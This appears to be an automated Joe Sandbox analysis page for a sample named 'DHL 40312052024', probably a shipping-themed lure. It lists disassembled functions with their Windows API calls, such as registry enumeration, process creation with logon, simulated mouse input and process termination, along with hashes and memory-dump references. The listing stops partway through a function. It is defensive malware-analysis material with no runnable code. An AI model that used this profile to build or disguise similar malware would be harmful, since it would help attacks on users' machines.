                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                    • API String ID: 3489934621-2819208100
                                                                                    • Opcode ID: b86b4d7196a02d8fec568bf1ddd03c315e462be4330cc9a02b874cf8960d96ae
                                                                                    • Instruction ID: 7620515cb44702ffe3540309661e4ce6352a7569dd5bd44bf699812e99f9be91
                                                                                    • Opcode Fuzzy Hash: b86b4d7196a02d8fec568bf1ddd03c315e462be4330cc9a02b874cf8960d96ae
                                                                                    • Instruction Fuzzy Hash: C8E0BF70A85304DFDB10AF71ED0DB053BA5B744743F504436F215D12B5CB7A8644DA66
                                                                                    Function 008164B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove$__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3253778849-0
                                                                                    • Opcode ID: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                                                    • Instruction ID: 595f90d89559d2f8e771d6297e49bbef170ce5a94e320344a98630cc0b3a1a9b
                                                                                    • Opcode Fuzzy Hash: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                                                    • Instruction Fuzzy Hash: 01617A3050025ADBCB01EF64CC8ABFE37A9EF55308F044519FA559B292EA38E955CB90
                                                                                    Function 008301E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                      • Part of subcall function 00830E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0082FDAD,?,?), ref: 00830E31
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008302BD
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008302FD
                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00830320
                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00830349
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0083038C
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00830399
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 4046560759-0
                                                                                    • Opcode ID: 383666c7b056dbd58167368ea81e3eb7840a68343fa16e943101e7a2b831e496
                                                                                    • Instruction ID: 30f99bf4a66f672d81759713cbe63d3f4cbabb4fe0044fd4a36ac7172be99beb
                                                                                    • Opcode Fuzzy Hash: 383666c7b056dbd58167368ea81e3eb7840a68343fa16e943101e7a2b831e496
                                                                                    • Instruction Fuzzy Hash: 18514631208204EFC705EF68C899EABBBE9FF85314F04491DF595872A2DB35E905CB92
                                                                                    Function 00835799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetMenu.USER32(?), ref: 008357FB
                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00835832
                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0083585A
                                                                                    • GetMenuItemID.USER32(?,?), ref: 008358C9
                                                                                    • GetSubMenu.USER32(?,?), ref: 008358D7
                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00835928
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                                    • String ID:
                                                                                    • API String ID: 650687236-0
                                                                                    • Opcode ID: c80b57fccb2e219c5852f0eb417cc659a19e5155fbb57afa05cfb71be13287d6
                                                                                    • Instruction ID: 09acd538b348af4d06ea3c38c87b9d672d6adc670fc8357c64318ccd915fde71
                                                                                    • Opcode Fuzzy Hash: c80b57fccb2e219c5852f0eb417cc659a19e5155fbb57afa05cfb71be13287d6
                                                                                    • Instruction Fuzzy Hash: 88512775E00619EFCB11AF64C845AAEBBB5FF88320F104469E951AB351CB74AE418B90
                                                                                    Function 0080EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 0080EF06
                                                                                    • VariantClear.OLEAUT32(00000013), ref: 0080EF78
                                                                                    • VariantClear.OLEAUT32(00000000), ref: 0080EFD3
                                                                                    • _memmove.LIBCMT ref: 0080EFFD
                                                                                    • VariantClear.OLEAUT32(?), ref: 0080F04A
                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0080F078
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 1101466143-0
                                                                                    • Opcode ID: 74cc4ba8390e0fa0b997c18d261d05dc70ff3927f40ef984c6797c3845e2ff0c
                                                                                    • Instruction ID: 01583010e6c1ee0b83602d143b064b1fa402aa743d07925af7dd41505d649b77
                                                                                    • Opcode Fuzzy Hash: 74cc4ba8390e0fa0b997c18d261d05dc70ff3927f40ef984c6797c3845e2ff0c
                                                                                    • Instruction Fuzzy Hash: AC516DB5A00209DFCB24CF58C884AAAB7F8FF4C314B158569EA59DB342E735E911CB90
                                                                                    Function 0081220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00812258
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008122A3
                                                                                    • IsMenu.USER32(00000000), ref: 008122C3
                                                                                    • CreatePopupMenu.USER32 ref: 008122F7
                                                                                    • GetMenuItemCount.USER32(000000FF), ref: 00812355
                                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00812386
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3311875123-0
                                                                                    • Opcode ID: 2970ddb5723c9da0b099dd9d1a3f87461e14a78537e184725f3242b03611a9ca
                                                                                    • Instruction ID: f8211678de4f0322478afae6e174ebdad0efac28862e50f4abbfd3a25b6ba83c
                                                                                    • Opcode Fuzzy Hash: 2970ddb5723c9da0b099dd9d1a3f87461e14a78537e184725f3242b03611a9ca
                                                                                    • Instruction Fuzzy Hash: 66519C70A00209DBDF21CF68D888BEDBBF9FF45318F104569E821D72A1D37489A5CB61
                                                                                    Function 007B1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                                                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 007B179A
                                                                                    • GetWindowRect.USER32(?,?), ref: 007B17FE
                                                                                    • ScreenToClient.USER32(?,?), ref: 007B181B
                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007B182C
                                                                                    • EndPaint.USER32(?,?), ref: 007B1876
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                    • String ID:
                                                                                    • API String ID: 1827037458-0
                                                                                    • Opcode ID: acaed46b7bd1235222fa63a1f6159c4ff63a31267c4ae2423a5bfcae59de85ed
                                                                                    • Instruction ID: 015e125495c6a21c3f8be5d2630fa415b003df7f88fea716150ea660bd8ddb5e
                                                                                    • Opcode Fuzzy Hash: acaed46b7bd1235222fa63a1f6159c4ff63a31267c4ae2423a5bfcae59de85ed
                                                                                    • Instruction Fuzzy Hash: BC41BF30500600EFD710DF25CC98FAB7BE8FB4A724F540629F6A8872A2D7749845DBA2
                                                                                    Function 0083B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(008757B0,00000000,01226D28,?,?,008757B0,?,0083B5A8,?,?), ref: 0083B712
                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0083B736
                                                                                    • ShowWindow.USER32(008757B0,00000000,01226D28,?,?,008757B0,?,0083B5A8,?,?), ref: 0083B796
                                                                                    • ShowWindow.USER32(00000000,00000004,?,0083B5A8,?,?), ref: 0083B7A8
                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 0083B7CC
                                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0083B7EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 642888154-0
                                                                                    • Opcode ID: ab2c05f84d6bcab042ff11fb01b3a9d4130a66439d7b933e156d311a91984a91
                                                                                    • Instruction ID: 9f1fef97315e47164e6ed460db9d50b5c77f775dcec1758f8a4d85a70d99992c
                                                                                    • Opcode Fuzzy Hash: ab2c05f84d6bcab042ff11fb01b3a9d4130a66439d7b933e156d311a91984a91
                                                                                    • Instruction Fuzzy Hash: FA414F74600244AFDB26CF24C49AB947BE1FBC5310F1881B9FA48CF6A2C771A856CBD1
                                                                                    Function 0082709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00824E41,?,?,00000000,00000001), ref: 008270AC
                                                                                      • Part of subcall function 008239A0: GetWindowRect.USER32(?,?), ref: 008239B3
                                                                                    • GetDesktopWindow.USER32 ref: 008270D6
                                                                                    • GetWindowRect.USER32(00000000), ref: 008270DD
                                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0082710F
                                                                                      • Part of subcall function 00815244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008152BC
                                                                                    • GetCursorPos.USER32(?), ref: 0082713B
                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00827199
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4137160315-0
                                                                                    • Opcode ID: 2a24668935bbb85307645d7d34c37da9861a31abf63396ed71132eca34fa7add
                                                                                    • Instruction ID: 9e35d9d1b657a6083a1a7b3ebfab9b31ac803509740f79bf576f2e40976daa78
                                                                                    • Opcode Fuzzy Hash: 2a24668935bbb85307645d7d34c37da9861a31abf63396ed71132eca34fa7add
                                                                                    • Instruction Fuzzy Hash: 0731CF72509315ABD720DF14D849E9BBBAAFFC8314F00092AF585D7192DA30EA59CBD2
                                                                                    Function 00808879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 008080A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008080C0
                                                                                      • Part of subcall function 008080A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008080CA
                                                                                      • Part of subcall function 008080A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008080D9
                                                                                      • Part of subcall function 008080A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008080E0
                                                                                      • Part of subcall function 008080A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008080F6
                                                                                    • GetLengthSid.ADVAPI32(?,00000000,0080842F), ref: 008088CA
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008088D6
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 008088DD
                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 008088F6
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,0080842F), ref: 0080890A
                                                                                    • HeapFree.KERNEL32(00000000), ref: 00808911
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                    • String ID:
                                                                                    • API String ID: 3008561057-0
                                                                                    • Opcode ID: 4db69268974742f6b5202a1c1b35375e290f8a937ca0df90da4bf3c267c36739
                                                                                    • Instruction ID: 234614577c3730f21902ab82dfb3bbdf6f66ccc5633f57ec5836f69dde311f07
                                                                                    • Opcode Fuzzy Hash: 4db69268974742f6b5202a1c1b35375e290f8a937ca0df90da4bf3c267c36739
                                                                                    • Instruction Fuzzy Hash: 1011B131901609FFDB55AFA4DC09FBE7B68FB84315F108428E985D7251CB329D84DBA0
                                                                                    Function 008085B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008085E2
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 008085E9
                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 008085F8
                                                                                    • CloseHandle.KERNEL32(00000004), ref: 00808603
                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00808632
                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00808646
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                    • String ID:
                                                                                    • API String ID: 1413079979-0
                                                                                    • Opcode ID: c078fe6c5b1b1158efbeb808ac431167737ac4037fcaf06d3ecfac71c36bd3f6
                                                                                    • Instruction ID: c4b699fe1da7db5edd9524ce2401cddf6cd1b0d0fdfad89b7adde5d8766f213e
                                                                                    • Opcode Fuzzy Hash: c078fe6c5b1b1158efbeb808ac431167737ac4037fcaf06d3ecfac71c36bd3f6
                                                                                    • Instruction Fuzzy Hash: 2F11477250124DEBDF118FA8DD49BDA7BA9FB48304F044065FE04A21A1C7728DA0ABA0
                                                                                    Function 0080B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 0080B7B5
                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0080B7C6
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0080B7CD
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0080B7D5
                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0080B7EC
                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0080B7FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDevice$Release
                                                                                    • String ID:
                                                                                    • API String ID: 1035833867-0
                                                                                    • Opcode ID: dcb57d73c531395fd4d46d0257d29c1e810dca73b3ddc6181c4c8d4a6f4de606
                                                                                    • Instruction ID: 3191c331ebc816728df3651810f071c83a7d3773b6a21ec3305686369161444a
                                                                                    • Opcode Fuzzy Hash: dcb57d73c531395fd4d46d0257d29c1e810dca73b3ddc6181c4c8d4a6f4de606
                                                                                    • Instruction Fuzzy Hash: F9014475E00619BBEB109BA69D45E5EBFB8FB88751F004075FB04E7292D6709C10CF91
                                                                                    Function 007D0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007D0193
                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 007D019B
                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007D01A6
                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007D01B1
                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 007D01B9
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007D01C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual
                                                                                    • String ID:
                                                                                    • API String ID: 4278518827-0
                                                                                    • Opcode ID: 11831a9fd92fd6ab0ac89772cd5ce89b3d9b0eacc10751cdd4f143d66574d24a
                                                                                    • Instruction ID: 2389469e46fcc0e0310954b44cfb06e1967d85eacf42f9a60f082ba8443034ae
                                                                                    • Opcode Fuzzy Hash: 11831a9fd92fd6ab0ac89772cd5ce89b3d9b0eacc10751cdd4f143d66574d24a
                                                                                    • Instruction Fuzzy Hash: 730148B09017597DE3008F5A8C85A52FEA8FF59354F00411BA15847942C7B5A864CBE5
                                                                                    Function 008153E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008153F9
                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0081540F
                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0081541E
                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0081542D
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00815437
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0081543E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                    • String ID:
                                                                                    • API String ID: 839392675-0
                                                                                    • Opcode ID: 3e618e7124206926868ed933bea96075780784b9cb1c30eca3fdf38a727c513a
                                                                                    • Instruction ID: c14759b3b83b0d1c06130b88646169e4efdaee92876a0e7a3203ef3dcb341eea
                                                                                    • Opcode Fuzzy Hash: 3e618e7124206926868ed933bea96075780784b9cb1c30eca3fdf38a727c513a
                                                                                    • Instruction Fuzzy Hash: 79F06D32A40558BBE3215BA2EC0EEEF7A7CFFD6B11F000569FA05D1062E7A01A0186F5
                                                                                    Function 00817230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00817243
                                                                                    • EnterCriticalSection.KERNEL32(?,?,007C0EE4,?,?), ref: 00817254
                                                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,007C0EE4,?,?), ref: 00817261
